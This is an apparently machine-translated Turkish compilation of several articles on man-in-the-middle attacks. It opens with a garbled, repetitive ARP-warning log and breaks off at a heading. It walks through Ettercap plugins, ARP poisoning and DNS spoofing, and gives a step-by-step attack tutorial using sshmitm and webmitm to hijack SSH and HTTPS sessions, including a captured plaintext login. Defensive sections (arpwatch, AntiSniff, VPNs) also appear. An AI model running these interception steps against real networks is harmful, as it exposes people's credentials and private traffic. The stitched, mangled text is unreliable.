görünüyor .1.1 arp_cop: (UYARI) 192.168.1.35, 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 192.168.1.35, 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 192.168.1.35, 192.168 .1 gibi davranıyor .1 arp_cop: (UYARI) 192.168 .1.35 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 192.168.1.35 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 192.168.1.35 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 192.168 .1 0,35 192.168.1.1 gibi görünüyor arp_cop: (UYARI) 192.168.1.35, 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 192.168.1.35, 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 192.168.1.35, 192.168.1.1 gibi davranıyor arp_co s: (UYARI) 192.168.1.35 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 192.168.1.35, 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 192.168.1.35, 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 192.168.1.35 s gibi davranıyor 192.168.1.1 arp_cop olsun : (UYARI) 192.168.1.35, 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 192.168.1.35, 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 192.168.1.35, 192.168.1.1 gibi davranıyor arp_cop: ( WA RNING) 192.168.1.35 gibi davranıyor 192.168.1.1 gibi görünüyor arp_cop: (UYARI) 192.168.1.35, 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 192.168.1.35, 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 192.168.1.35, 1 gibi davranıyor 92. 168.1.1 arp_cop: (UYARI) 192.168.1.35, 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 192.168.1.35, 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 192.168.1.35, 192 gibi davranıyor. 16 8.1.1 arp_cop: ( UYARI) 192.168.1.35, 192.168.1.1 arp_cop gibi davranıyor: (UYARI) 192.168.1.35, 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 192.168.1.35, 192.168.1.1 arp_cop gibi davranıyor: (UYARI) ) 192.168.1.35 öyleymiş gibi davranıyor 192.168.1.1 arp_cop: (UYARI) 192.168.1.35, 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 192.168.1.35, 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 192.168.1.35, 19 gibi davranıyor 2.168.1.1 arp_cop: (UYARI) 192.168.1.35, 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 192.168.1.35, 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 192.168.1.35, 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 19 2.168.1.35, 192.168 gibi görünüyor. 1.1.................................

7.2 otomatik ekleme

ARP zehirlenmesi mitma saldırısına bağlandıklarında yeni kurbanları otomatik olarak ekleyecektir. Yerel ağdaki ARP isteklerini arar ve tespit edilirse eklenti, liste HEDEF olarak belirtilmişse ana bilgisayarı kurbanlar listesine ekleyecektir. Bir arp isteği göründüğünde bir ana bilgisayar eklenir.

7.3 chk_poison

Ettercap'taki arp asitleme modüllerinin başarılı olup olmadığını kontrol eder. Her bir kurbanmış gibi davranarak tüm yem kurbanlarına sahte ICMP yankı paketleri gönderir. Hedef olarak MAC adresimizle bir ICMP yanıtı yakalayabilir, bu da iki hedef arasındaki tuzağa düşürmenin başarılı olduğu anlamına gelir. Her bağlantının her iki yolunu da kontrol eder.

7.4 dns_spoof

Bu eklenti, DNS isteklerini kesintiye uğratır ve sahte (sahte) bir yanıtla yanıt verir. Etter.dns dosyasını düzenleyerek eklentinin hangi adrese yanıt vereceğini seçebilirsiniz. Eklenti A, AAAA, PTR, MX, WINS, SRV ve TXT isteklerini yakalar. Bu bir A isteğiyse, dosyada ad aranır ve IP adresi döndürülür (adda joker karakterler kullanabilirsiniz).

Aynı durum AAAA istekleri için de geçerlidir.

7.5 find_conn

Ana bilgisayarın iletişim kurmak istediği tüm hedefleri size göstermek için ARP isteklerini dinleyen çok basit bir eklenti. Ayrıca bilinmeyen LAN'lardaki adresleri bulmanıza da yardımcı olabilir.

Ettercap -TQzP find_conn ettercap -TQu -i eth0 -P find_conn

7.6 find_ettercap

LAN'a gönderilen ettercap paketlerini tanımlamaya çalışır. Ettercap kullanmaya çalışan birinin belirlenmesinde faydalı olabilir. Testler yalnızca belirli diziler/kimlik numaraları üzerinde çalıştığı için buna %100 güvenmeyin.

7.7 tarama_zehirleyici

Listedeki ana bilgisayarlardan herhangi biri ile bizim aramıza giren birisinin olup olmadığını kontrol edeceğiz. Öncelikle listedeki iki ana bilgisayarın aynı özelliklere sahip olup olmadığını kontrol eder. Mac Adresi. Bu, birinin diğeri gibi davranarak bizi zehirlediği anlamına gelebilir. Proxy-arp ortamında çok sayıda hatalı pozitif sonuç üretebilir. Bu kontrolü gerçekleştirmek için bir ana bilgisayar listesi oluşturmalısınız. Bundan sonra listedeki her ana bilgisayara icmp echo paketleri göndererek yanıt kaynağının mac adresinin o IP ile listede sakladığımız adresten farklı olup olmadığını kontrol eder. Bu, birisinin IP adresimizi biliyormuş gibi davranarak ve ele geçirilen paketleri bize ileterek bu ana bilgisayarı tuzağa düşürdüğü anlamına gelebilir. Bu etkin testi zararsız modda çalıştıramazsınız.

Ettercap -TQP scan_poisoner //

7.8 arama_promisc

Herhangi birinin rastgele modda koklayıp dinlemediğini bulmaya çalışır. Ana bilgisayar listesindeki her hedefe iki farklı, kötü biçimlendirilmiş arp isteği gönderir ve yanıtları bekler. Yanıt hedef bilgisayardan geldiyse, hedefin ağ kartını karışık modda bulundurması az çok olasıdır. Yanlış alarmlar üretebilir. Komut satırından veya eklentiler menüsünden çalıştırabilirsiniz. Arp yanıtlarını dinlediğinden arp isteklerini gönderirken bunları kullanmamanız daha iyi olacaktır.

Ettercap -TQP arama_promisc /192.168.0.1/ ettercap -TQP arama_promisc //

Karışık modda iki ağ kartını başarıyla tahmin etmeye bir örnek:

Genişletmek

Root@HackWare:~# ettercap -TQP search_promisc ettercap 0.8.2 telif hakkı 2001-2015 Ettercap Geliştirme Ekibi Dinleme yeri: eth0 -> 08:00:27:AF:30:B9 192.168.1.35/255.255.255.0 fe80::a00: 27ff:feaf:30b9/64 SSL incelemesi, etter.conf dosyasında geçerli bir "redir_command_on" komut dosyası gerektiriyor Ettercap düzgün çalışmayabilir. /proc/sys/net/ipv6/conf/eth0/use_tempaddr 0'a ayarlanmadı. Ayrıcalıklar EUID 65534'e düştü EGID 65534... 33 eklenti 42 protokol ayırıcı 57 bağlantı noktası izleniyor 20388 mac satıcı parmak izi 1766 tcp işletim sistemi parmak izi 2182 bilinen hizmet Lua : hiçbir komut dosyası belirtilmedi, başlatılmıyor! 255 ana bilgisayar tarama için rastgele seçiliyor... Ağ maskesinin tamamı 255 ana bilgisayar için taranıyor... * |============================== ============= =====================>| %100,00 5 ana bilgisayar ana makine listesine eklendi... Birleşik sniffing başlatılıyor... Yalnızca metin Arayüz etkinleştirildi... Satır içi yardım için "h" tuşuna basın Search_promisc eklentisi etkinleştiriliyor... search_promisc: promisc NIC'ler aranıyor... NIC'lerin koklanma olasılığı daha düşük : - 192.168.1.36 - 192.168.1.34 Büyük olasılıkla NIC'leri kokluyor: - YOK Metin arayüzü kapatılıyor... Ettercap sonlandırılıyor... Lua temizliği tamamlandı! Birleşik koklama durduruldu.

7.9 SSL şeridi

Bir SSL Mitm saldırısı sırasında Ettercap, gerçek SSL sertifikasını kendisininkiyle değiştirir. Sahte sertifika anında oluşturulur ve tüm alanlar sunucu tarafından sunulan gerçek sertifikaya uygun olarak doldurulur.

(62%)

(56.5%)

(RASTGELE - %0,2)

Bu yazımızda Ortadaki Adam gibi saldırılara, daha doğrusu yöntemine bakacağız.
Ortadaki Adam saldırısını kullanarak SSH ve HTTP trafiğini yeniden yönlendirmek. Kediyi kuyruğundan çekmeyelim ama işe dönelim.

Ortadaki Adam (kısaca MitM, Rusça'dan kısaca - “aracının saldırısı” veya “adam)
ortada"), iki makine arasındaki trafiğin bilgileri ele geçirmek (daha fazla araştırmak, yok etmek veya değiştirmek) için yeniden yönlendirilmesine dayanan bir saldırı türüdür. Yani ihtiyacımız olan ilk şey dsniff paketidir (şu adreste pakete bir bağlantı göreceksiniz) Neden Evet, çünkü bu paket, aşağıdaki güvenlik şemasını atlayabilen sshmitm (SSH trafiğini yeniden yönlendirme) ve httpmitm (HTTP trafiğini yeniden yönlendirme) dahil olmak üzere gerekli tüm yardımcı programları içerir: bildiğiniz kadarıyla, veri şifreleme oldukça iyidir - "güvenlidirler" (şifreleme yardımcı olur :)) ve saldırıların ağ katmanının "üstünde" gerçekleştirilmesine izin vermezler. Şifreleme anahtarı bilgisayar korsanı tarafından bilinmiyor - verilerin şifresini çözmek imkansızdır ve bir komut da ekleyin. Her şey yolunda görünüyor, ama işte böyle
dsniff paketindeki MitM saldırı programları (sshmitm ve httpmitm) atlayabildiğinden bu sistem güvenlik (neredeyse her şeyi atlayabilirsiniz). Bütün bunlar aşağıdaki prensibe göre yapılır:
ara ana bilgisayar istemciden isteği alır, kendisine sunucu olduğunu "söyler" ve ardından gerçek sunucuya bağlanır.
İhtiyacımız olan ikinci şey düz kollar, dördüncü şey - en önemlisi - arzu ve elbette bir kurban, yani saldıracağımız bilgisayar.

SSH trafiğini yönlendirme

Araçları hazırladıktan sonra neyin ne olduğunu ve nedenini anladınız :). Sshmitm edinin - şimdi SSH trafiğini yönlendireceğiz (teorik kısımda anlamadığınız her şey - yukarıyı okuyun)
günümüzün PKI'sının (genel anahtar altyapısı - temele dayanan bir anahtar yönetim şeması) eksikliklerinden yararlanarak bunu kullanarak
asimetrik kriptografi yöntemleri). Sözdizimine bakalım
sshmitm:

sshmitm [-d] [-I] [-p bağlantı noktası] ana bilgisayar

D
hata ayıklama çıktısına izin ver (yani daha gelişmiş mod)

BEN
oturum çalma

P bağlantı noktası
dinleme portu

ev sahibi
Oturumları durdurulacak uzak ana bilgisayarın adresi

liman
uzak ana bilgisayardaki bağlantı noktası

Her şey basit ve zevkli görünüyor; karmaşık hiçbir şey yok :). Saldırıyı uygulamaya başlayalım!

# sshmitm server.target.gov // SSH sunucunuzu belirtin
sshmitm: server.target.gov sunucusuna geçiş

Gerçek bir SSH anahtarımız olmadığından saldırıya uğrayan sistemin komut yorumlayıcısı
Ana bilgisayar anahtarını kontrol etme isteği görüntülenecektir, hepsi şuna benzer:

clientmachine$ sunucu.target.gov
@UYARI: UZAK ANA SAYFA KİMLİĞİ DEĞİŞTİ! @
BİRİSİNİN KÖTÜ BİR ŞEY YAPMASI MÜMKÜNDÜR!
Birisi şu anda sizi gizlice dinliyor olabilir (ortadaki adam saldırısı)!
RSA ana bilgisayar anahtarının yeni değiştirilmiş olması da mümkündür.
Lütfen sistem yöneticinize başvurun.

Daha sonra kullanıcı bağlanıp bağlanmayacağına karar verecektir. Cevabınız evet ise SSH oturumu üzerinde tam kontrole sahip olacağız.
ANCAK! Kullanıcı o araca hiç bağlanmadıysa aşağıdaki mesaj görüntülenebilir:

"server.target.gov" ana bilgisayarının orijinalliği belirlenemiyor
RSA anahtar parmak izi
bla:bla:bla;bla;bla........
Bağlanmaya devam etmek istediğinizden emin misiniz (evet/hayır)?

Burada kullanıcının ayrıca iki seçeneği vardır: bağlanmak veya bağlanmamak. Eğer öyleyse, o zaman oturumu durdurduk, değilse, o zaman ne yazık ki... :(.
Genel olarak, eğer kullanıcı bağlanırsa ve sshmitm tüm geçişleri ve girişleri çok okunaklı bir şekilde kaydederse saldırı başarılı olmuştur :)
Doğal olarak, bu tek SSH oturum önleyicisi değil, ancak buna aşina olduğunuzda, başka bir tanede kolayca ustalaşabilirsiniz :)

HTTP Trafiğinin Yönlendirilmesi

Şimdi HTTP trafiğini yönlendireceğiz. Yine önceden seçilmiş bir araca ihtiyacımız olacak: 80 (HTTP -) ve 443 (HTTPS -) bağlantı noktalarını dinleyen, WEB isteklerini engelleyen, ardından sunucuya bağlanan ve istekleri istemci bilgisayara ileten httpmitm. Program ayrıca OpenSSL kullanarak SSL anahtarları ve SSL sertifikaları oluşturur. Daha sonra denedikten sonra
siteye (target.gov) bağlandığında, tarayıcı SSL sertifikasını kontrol edecektir. Sertifikalar eşleşmeyeceği için kullanıcının tarayıcısı şu konuda uyarı verecektir:
yanlış SSL sertifikası. Saldırganın bakış açısından şöyle görünecektir:

#webmitm -d
webmitm: şeffaf bir şekilde aktarma
webmitm: yeni bağlantı
GET [link]/uzerz.php?user=hellknights&password=neskaju1qwerty HTTP/[versiyon]
Bağlantı türü]
Sunucu: www.target.gov
Kullanıcı Aracısı: [sistem, tarayıcı bilgisi]
[vb, vb, vb]
Çerez: [çerezler]

Dışarıdan bakıldığında her şey böyle görünüyor -
SSL bağlantısı kesilir ve şifrelenmemiş veriler yakalanır.

Çözüm

Bu yazımızda Man in the Middle saldırısı kullanılarak SSH ve HTTP trafiğinin yeniden yönlendirilmesine - açık, detaylı, kısaca - baktık. Diğer HTTP ve SSH yeniden yönlendiricileri
Bunlarda da ustalaştıysanız MitM kullanarak trafiğe hızlı bir şekilde hakim olursunuz :)). Bir şey belirsiz olsaydı, o zaman...

Verilerin ağ üzerinden ele geçirilmesi, uzaktaki bir bilgisayar cihazından herhangi bir bilginin alınmasıdır. Kullanıcının kişisel bilgilerinden, mesajlarından ve web sitesi ziyaret kayıtlarından oluşabilir. Veri yakalama, casus yazılım veya ağ algılayıcıları kullanılarak gerçekleştirilebilir.

Casus yazılım, belirli bir iş istasyonundan veya cihazdan ağ üzerinden iletilen tüm bilgileri kaydedebilen özel bir yazılımdır.

Algılayıcı, bir ağ üzerinden geçen trafiği yakalayan ve analiz eden bir program veya bilgisayar teknolojisidir. Sniffer, bir web oturumuna bağlanmanıza ve bilgisayar sahibi adına çeşitli işlemler gerçekleştirmenize olanak tanır.

Bilgi gerçek zamanlı olarak aktarılmıyorsa, casus yazılım Bilgileri görüntülemeyi ve analiz etmeyi kolaylaştıran raporlar oluşturun.

Ağın ele geçirilmesi yasal veya yasa dışı olarak gerçekleştirilebilir. Bilgi edinmenin yasallığını belirleyen ana belge Siber Suçlar Sözleşmesidir. 2001 yılında Macaristan'da kuruldu. Yasal gereklilikler eyaletten eyalete biraz farklılık gösterebilir ancak temel mesaj tüm ülkeler için aynıdır.

Ağ üzerinden veri ele geçirmenin sınıflandırılması ve yöntemleri

Yukarıdakilere uygun olarak, bir ağ üzerinden bilgilerin ele geçirilmesi iki türe ayrılabilir: yetkili ve yetkisiz.

Yetkili veri toplama, kurumsal bilgilerin korunmasından ulusal güvenliğin sağlanmasına kadar çeşitli amaçlarla gerçekleştirilir. Böyle bir işlemi gerçekleştirmenin gerekçeleri mevzuat, özel hizmetler, kolluk kuvvetleri ve uzmanlar tarafından belirlenir. idari organizasyonlar ve şirket güvenlik hizmetleri.

Veri müdahalesini gerçekleştirmek için uluslararası standartlar vardır. Avrupa Telekomünikasyon Standartları Enstitüsü, bilgilerin ele geçirilmesinin dayandığı bir dizi teknik süreci (ETSI ES 201 158 “Telekomünikasyon güvenliği; Yasal Dinleme (LI); Ağ işlevleri için gereklilikler”) uyumlu hale getirmeyi başarmıştır. Sonuç olarak, gizli servis uzmanlarının ve ağ yöneticilerinin ağdan yasal olarak veri elde etmelerine yardımcı olan bir sistem mimarisi geliştirildi. Ağ üzerinden veri müdahalesini gerçekleştirmek için geliştirilen yapı, kablolu ve kablosuz sistemler sesli aramaların yanı sıra posta yoluyla yazışmalar, sesli mesajların IP üzerinden iletilmesi, SMS yoluyla bilgi alışverişi.

Bir ağ üzerinden verilere yetkisiz müdahale, gizli verileri, şifreleri, kurumsal sırları, ağdaki bilgisayar makinelerinin adreslerini vb. ele geçirmek isteyen saldırganlar tarafından gerçekleştirilir. Hedeflerine ulaşmak için, bilgisayar korsanları genellikle bir ağ trafiği analizörü olan bir algılayıcı kullanır. Bu program veya bir donanım-yazılım cihazı, dolandırıcıya, sertifika sahteciliği yoluyla şifrelenmiş SSL trafiği de dahil olmak üzere, kurban kullanıcının bağlı olduğu ağ içindeki bilgileri yakalama ve analiz etme yeteneği verir. Trafik verileri farklı yollarla elde edilebilir:

ağ arayüzünü dinlemek,
bir dinleme cihazının kanal kesmesine bağlanması,
bir trafik dalı oluşturmak ve onu sniffer'a kopyalamak,
bir saldırı gerçekleştirerek.

Ayrıca, kişinin ağ etkileşimlerine izinsiz girmesine ve verileri değiştirmesine olanak tanıyan önemli bilgilerin ele geçirilmesi için daha karmaşık teknolojiler de vardır. Bu tür tekniklerden biri sahte ARP istekleridir. Yöntemin özü, kurbanın bilgisayarı ile saldırganın cihazı arasındaki IP adreslerini değiştirmektir. Bir ağ üzerinden verilere müdahale etmek için kullanılabilecek başka bir yöntem de yanlış yönlendirmedir. Bir ağ yönlendiricisinin IP adresini kendi adresinizle değiştirmeyi içerir. Bir siber suçlu, kurbanın bulunduğu yerel ağın nasıl organize edildiğini biliyorsa, kullanıcının makinesinden IP adresine bilgi alınmasını kolayca düzenleyebilir. Bir TCP bağlantısının yakalanması aynı zamanda hizmet eder etkili bir şekilde veri müdahalesi. Saldırgan, TCP paketleri oluşturup kurbanın bilgisayarına göndererek iletişim oturumunu keser. Daha sonra iletişim oturumu müşteri yerine suçlu tarafından yeniden başlatılır, durdurulur ve sürdürülür.

Etki nesnesi

Ağ üzerinden veri ele geçirmenin nesneleri devlet kurumları, endüstriyel işletmeler, ticari yapılar ve sıradan kullanıcılar olabilir. Bir kuruluş veya ticari şirket içerisinde ağ altyapısını korumak amacıyla bilgiler yakalanabilir. İstihbarat teşkilatları ve kolluk kuvvetleri, eldeki göreve bağlı olarak, farklı sahiplerden iletilen bilgilere toplu olarak müdahale edebilir.

Siber suçlulardan bahsedersek, herhangi bir kullanıcı veya kuruluş, ağ üzerinden iletilen verileri elde etmek için etki nesnesi haline gelebilir. Yetkili erişimde, alınan bilginin bilgilendirici kısmı önemlidir, saldırgan ise ele geçirmek için kullanılabilecek verilerle daha çok ilgilenir. nakit veya sonraki satışı için değerli bilgiler.

Çoğu zaman, örneğin erişim noktası olan bir kafede halka açık bir ağa bağlanan kullanıcılar, siber suçluların bilgileri ele geçirmesinin kurbanı oluyor. Wi-Fi erişimi. Saldırgan bir algılayıcı kullanarak bir web oturumuna bağlanır, verileri değiştirir ve kişisel bilgileri çalar. Makalede bunun nasıl gerçekleştiği hakkında daha fazla bilgi edinin.

Tehdidin kaynağı

Şirket ve kuruluşlardaki bilgilerin yetkili olarak ele geçirilmesi, kamu ağı altyapı operatörleri tarafından gerçekleştirilir. Faaliyetleri kişisel verilerin, ticari sırların ve diğer bilgilerin korunmasını amaçlamaktadır. önemli bilgi. Yasal olarak mesajların ve dosyaların aktarımı, vatandaşların ve devletin güvenliğinin sağlanması amacıyla istihbarat servisleri, kolluk kuvvetleri ve çeşitli devlet kurumları tarafından izlenebilmektedir.

Suçlular yasa dışı veri ele geçirme faaliyetlerine girişmektedir. Bir siber suçlunun kurbanı olmaktan kaçınmak için uzmanların bazı tavsiyelerine uymanız gerekir. Örneğin halka açık ağlara bağlantının olduğu yerlerde yetkilendirme ve hassas veri aktarımı gerektiren işlemler yapmamalısınız. Şifreli ağları seçmek daha güvenlidir ve hatta kişisel 3G ve LTE modemlerini kullanmak daha da iyidir. Kişisel verileri aktarırken, HTTPS protokolü veya kişisel VPN tüneli kullanılarak şifrelenmesi önerilir.

Kriptografi ve anti-sniffer'ları kullanarak bilgisayarınızı ağ trafiğine müdahale etmekten koruyabilirsiniz; Kablosuz ağ erişimi yerine çevirmeli bağlantı riskleri azaltacaktır.

Bu derste ağ paketlerinin ele geçirilmesine dayanan ağ korsanlığı teknolojileri açıklanmaktadır. Bilgisayar korsanları bu tür teknolojileri, değerli bilgileri çalmak amacıyla ağ trafiğini dinlemek, ortadaki adam saldırısı amacıyla verilere müdahale etmek, TCP bağlantılarına müdahale etmek, örneğin veri sahtekarlığına izin vermek ve diğer işlemleri gerçekleştirmek için kullanır. , daha az ilginç eylem yok. Ne yazık ki, bu saldırıların çoğu aslında yalnızca Unix ağları için uygulanıyor ve bilgisayar korsanları her ikisini de kullanabiliyor. özel araçlar ve Unix sistem araçları. Görünüşe göre Windows ağları bilgisayar korsanları tarafından göz ardı edildi ve veri ele geçirme araçlarına ilişkin açıklamamızı, ağ paketlerinin önemsiz bir şekilde dinlenmesi için tasarlanmış dinleme programlarıyla sınırlamak zorunda kaldık. Bununla birlikte, kullanılan bilgisayar korsanlığı teknolojileri hakkında bilgi sahibi olmak birçok sorunun önlenmesine yardımcı olacağından, özellikle bilgisayar korsanlarına karşı bu tür saldırıların en azından teorik açıklamasını ihmal etmemek gerekir.

Ağ koklama

Genellikle Ethernet ağlarını koklamak için kullanılır. ağ kartları dinleme moduna geçti. Dinleme Ethernet ağları bir algılama programı çalıştıran bir bilgisayarın bir ağ bölümüne bağlanmasını gerektirir; bundan sonra bu ağ bölümündeki bilgisayarlar tarafından gönderilen ve alınan tüm ağ trafiği bilgisayar korsanının kullanımına sunulur. Kablosuz ağ aracılarını kullanan radyo ağlarından gelen trafiği engellemek daha da kolaydır - bu durumda kabloya bağlanmak için bir yer aramanıza bile gerek yoktur. Veya bir saldırgan, bilgisayarı İnternet sunucusuna bağlayan telefon hattına bağlanarak bunun için uygun bir yer bulabilir (telefon hatları genellikle bodrum katlarına ve nadiren ziyaret edilen diğer yerlere herhangi bir koruma olmadan döşenir).

Sniffing teknolojisini göstermek için, birçok Web sitesinde bulunabilen çok popüler sniffer programı SpyNet'i kullanacağız. SpyNet programının resmi web sitesi http://members.xoom.com/layrentiu2/ adresinde bulunmaktadır ve buradan programın demo sürümünü indirebilirsiniz.

SpyNet programı iki bileşenden oluşur - CaptureNet ve PipeNet. CaptureNet programı, Ethernet ağı üzerinden iletilen paketleri ağ düzeyinde engellemenize olanak tanır; Ethernet çerçeveleri şeklinde. PipeNet yazılımı, Ethernet çerçevelerini uygulama katmanı paketlerinde birleştirmenize, örneğin mesajları geri yüklemenize olanak tanır E-posta, HTTP protokolü mesajları (Web sunucusuyla bilgi alışverişi) ve diğer işlevleri yerine getirir.

Ne yazık ki SpyNet demosunda PipeNet'in yetenekleri HTTP paket derleme demosuyla sınırlıdır, dolayısıyla SpyNet'i tam olarak gösteremeyeceğiz. Ancak SpyNet'in ağ koklama yeteneklerini deneysel ağımızı örnek olarak kullanarak göstereceğiz. Metin dosyası Sword-2000 sunucusundan Alex-Z sunucusuna her zamanki gibi Windows Gezgini. Aynı zamanda, A1ex-1 bilgisayarında, iletilen paketleri engelleyecek ve iletilen dosyanın içeriğini Ethernet çerçevelerinde okumamıza izin verecek CaptureNet programını başlatacağız. İncirde. Şekil 1, secret.txt dosyasındaki gizli mesajın metnini gösterir; bu metni yakalanan Ethernet çerçevelerinde bulmaya çalışacağız.

Pirinç. 1. Not Defteri penceresindeki gizli mesajın metni

Ethernet çerçevelerini yakalamak için şu adımları izleyin:

Alex-Z bilgisayarında CaptureNet programını çalıştırın. Programın görüntülenen çalışma penceresinde, Yakala * Başlat (Yakala * Başlat) menü komutunu seçin ve ağ çerçevelerini yakalama işlemini başlatın.

Windows Gezgini'ni kullanarak, Security.txt dosyasını Sword-2000 bilgisayarından A1ex-3'e kopyalayın.

Secret.txt dosyasını aktardıktan sonra Capture * Stop menü komutunu seçin ve yakalama işlemini durdurun.

Yakalanan Ethernet çerçeveleri CaptureNet program penceresinin sağ tarafında görünecektir (Şekil 2), üstteki listedeki her satır bir Ethernet çerçevesini temsil edecek ve listenin altında seçilen çerçevenin içerikleri yer alacaktır.

Pirinç. 2. Ethernet çerçevesi gizli mesaj metni içerir

Yakalanan karelerin listesine baktıktan sonra ilettiğimiz metni içeren kareyi kolayca bulabiliriz. Bu çok büyük bir sırdır (Bu çok büyük bir sırdır).

Bunun, ele geçirilen tüm ağ trafiğinin kaydedildiği en basit örnek olduğunu vurguluyoruz. CaptureNet, belirli protokoller üzerinden ve belirli ana bilgisayar bağlantı noktalarına gönderilen paketleri engellemenize, belirli içeriğe sahip mesajları seçmenize ve yakalanan verileri bir dosyada biriktirmenize olanak tanır. Bu tür eylemleri gerçekleştirme tekniği basittir ve SpyNet programının yardım sistemi kullanılarak öğrenilebilir.

İlkel ağ gizlice dinlemeye ek olarak, bilgisayar korsanları daha karmaşık veri dinleme araçlarına da erişebilirler. Aşağıda teorik açıdan da olsa bu tür yöntemlere kısa bir genel bakış bulunmaktadır. Bunun nedeni, Windows ağları için veri ele geçirme saldırılarının pratik uygulamasının son derece sınırlı olması ve müdahale saldırıları için güvenilir yardımcı programların oldukça zayıf olmasıdır.

Ağ trafiğini ele geçirme yöntemleri

Yukarıdaki CaptureNet gibi ağ analizörü programlarını kullanarak ağ koklama, verilere müdahale etmenin ilk ve en basit yoludur. SpyNet'e ek olarak, başlangıçta ağ etkinliğini analiz etmek, ağları teşhis etmek, trafiği belirli kriterlere göre seçmek ve diğer ağ yönetimi görevleri amacıyla geliştirilen ağ koklama için birçok araç kullanılır. Böyle bir programa örnek olarak tcpdump (http://www.tcpdump.org) verilebilir; bu, daha sonraki analizler için ağ trafiğini özel bir günlüğe kaydetmenize olanak tanır.

Ağın gizlice dinlenmesine karşı koruma sağlamak için, ağ trafiğini dinleyen ağdaki bilgisayarları tanımlayabilen AntiSniff (http://www.securitysoftwaretech.com/antisniff) gibi özel programlar kullanılır. Sorunlarını çözmek için, antisniffer programları ağda dinleme cihazlarının varlığına dair özel bir işaret kullanır - algılama bilgisayarının ağ kartı özel bir dinleme modunda olmalıdır. Dinleme modundayken ağ bilgisayarları, test edilen ana bilgisayara gönderilen IP datagramlarına özel bir şekilde tepki verir. Örneğin, dinleyen ana bilgisayarlar genellikle yalnızca ana bilgisayarın adresine gönderilen datagramları değil, gelen tüm trafiği işler. AntiSniff'in tanıyabileceği şüpheli ana bilgisayar davranışını gösteren başka işaretler de vardır.

Yanlış ARP istekleri

Bir saldırgan, iki ana bilgisayar A ve B arasındaki ağ etkileşimi sürecini engellemek ve devralmak için, A ve B ana bilgisayarlarına sahte ARP (Adres Çözümleme Protokolü) mesajları göndererek, etkileşimde bulunan ana bilgisayarların IP adreslerini kendi IP adresiyle değiştirebilir. Ana bilgisayarın IP adresini, ana bilgisayarın ağ kartına sabit kodlanmış makine adresine (MAC adresi) çözümleme (dönüştürme) prosedürünü açıklayan Ek D'de ARP protokolü hakkında bilgi edinebilirsiniz. Bir bilgisayar korsanının A ve B ana bilgisayarları arasındaki ağ iletişimini engellemek için ARP'yi nasıl kullanabileceğini görelim.

Saldırgan, örneğin W2RK paketindeki nbtstat komutunu kullanarak A ve B ana bilgisayarlarının MAC adreslerini belirler.

Saldırgan, A ve B ana bilgisayarlarının tanımlanmış MAC adreslerine, ana bilgisayarların IP adreslerinin bilgisayarların MAC adreslerine çözümlenmesine yönelik taleplere sahte ARP yanıtları olan mesajlar gönderir. Ana Bilgisayar A, Ana Bilgisayar B'nin IP adresinin saldırganın bilgisayarının MAC adresine karşılık geldiği konusunda bilgilendirilir; Ana bilgisayar B, ana bilgisayar A'nın IP adresinin aynı zamanda saldırganın bilgisayarının MAC adresine de karşılık geldiği konusunda bilgilendirilir.

A ve B ana bilgisayarları, alınan MAC adreslerini ARP önbelleklerinde saklar ve ardından bunları birbirlerine mesaj göndermek için kullanırlar. A ve B IP adresleri saldırganın bilgisayarının MAC adresine karşılık geldiğinden, A ve B ana bilgisayarları, hiçbir şüphe duymadan, mesajlarıyla her şeyi yapabilen bir aracı aracılığıyla iletişim kurar.

Bu tür saldırılara karşı korunmak için ağ yöneticilerinin, ağ bilgisayarlarının MAC adresleri ile IP adresleri arasındaki yazışma tablosunu içeren bir veritabanı tutması gerekir. Daha sonra özel bir araç kullanarak yazılımÖrneğin, arpwatch yardımcı programları (ftp://ftp.ee.lbl.gov/arpwatch-2.lab.tar.gz) ağı periyodik olarak inceleyebilir ve tutarsızlıkları tespit edebilir.

UNIX ağlarında, bu tür sahte ARP isteği saldırısı, ağ trafiğini izlemeye ve yönetmeye yönelik arpredirect gibi sistem yardımcı programları kullanılarak uygulanabilir. Ne yazık ki, bu tür güvenilir yardımcı programlar Windows 2000/XP ağlarında uygulanmıyor gibi görünüyor. Örneğin, NTsecurity web sitesinde (http://www.ntsecurity.nu), ağ ana bilgisayarları arasındaki trafiği yeniden yönlendirmek için bir araç olarak sunulan GrabitAII yardımcı programını indirebilirsiniz. Bununla birlikte, GrabitAII yardımcı programının işlevselliğinin temel kontrolü, işlevlerinin uygulanmasında tam başarının hala çok uzakta olduğunu göstermektedir.

Yanlış yönlendirme

Yanlış yönlendirme gerçekleştirmek için saldırganın, A ana bilgisayarının bulunduğu yerel ağın organizasyonu hakkında bazı ayrıntıları, özellikle de A ana bilgisayarından B'ye trafiğin gönderildiği yönlendiricinin IP adresini bilmesi gerekir. Saldırganın bunu bilmesi gerekir. IP'nin gönderici adresinin yönlendiricinin IP adresi olarak tanımlandığı ve alıcının ana bilgisayar A olduğu bir IP veri birimi oluşturacaktır. Veri biriminde ayrıca yeni yönlendiricinin adres alanının şu şekilde ayarlandığı bir ICMP Yönlendirme mesajı bulunur: Saldırganın bilgisayarının IP adresi. Böyle bir mesaj alan A sunucusu, tüm mesajları saldırganın bilgisayarının IP adresine gönderecektir.

Bölüm 4'te açıklanan bilgi alışverişini korumaya yönelik tüm şifreleme yöntemlerinin pratik uygulaması VPN (Sanal Özel Ağ) ağları tarafından sağlanır. Kriptografik güvenlik ilkeleri ve tekniklerine kısa bir genel bakış Ek E'de bulunabilir ve Detaylı Açıklama PGP Desktop Security uygulaması (http://www.pgp.com) tarafından sağlanan kriptografik koruma araçları.

TCP bağlantısının kesilmesi

